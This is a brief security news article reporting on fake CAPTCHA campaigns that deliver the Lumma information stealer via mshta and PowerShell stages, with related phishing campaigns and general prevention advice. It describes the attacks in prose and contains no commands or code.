Fake CAPTCHA campaigns are being used to spread the Lumma information stealer globally, targeting industries such as healthcare, banking, and telecommunications. The campaign affects countries including Argentina, Colombia, the U.S., and the Philippines, according to a recent report.
The attack begins when users visit compromised websites. These sites redirect visitors to a fake CAPTCHA page that tricks them into running a command on their computer. This command uses the Windows mshta.exe tool to download and execute a harmful HTA file from a remote server.
This file runs a PowerShell command that launches a multi-stage process. The process includes unpacking scripts to bypass Windows Antimalware Scan Interface (AMSI) and downloading the Lumma Stealer payload. By leveraging user actions outside the browser, attackers bypass standard browser-based defenses.
Lumma Stealer operates as malware-as-a-service (MaaS), allowing cybercriminals to distribute it efficiently. Recent delivery methods include nearly 1,000 fake domains mimicking trusted platforms like Reddit and WeTransfer. These fake sites offer password-protected archives that contain a malicious AutoIT-based dropper, which deploys the stealer.
Similar tactics were observed earlier this year when over 1,300 fake domains impersonated AnyDesk to distribute Vidar Stealer malware. Meanwhile, an updated phishing toolkit called Tycoon 2FA complicates detection by security tools. It uses legitimate or compromised email accounts to send phishing messages and detects attempts to inspect its web pages.
Additionally, attackers have exploited Gravatar profiles to mimic services like AT&T and Proton Mail, tricking users into entering credentials. These tailored social engineering techniques further enhance their success rates.
Preventing the Threat
Organizations must focus on comprehensive cybersecurity measures to counter these threats. Regular software updates, strict email filtering, and user training can help prevent malware execution. Employing behavioral analytics and endpoint detection solutions ensures proactive threat mitigation. Blocking access to suspicious domains and monitoring for unusual user activity can also reduce the risk.
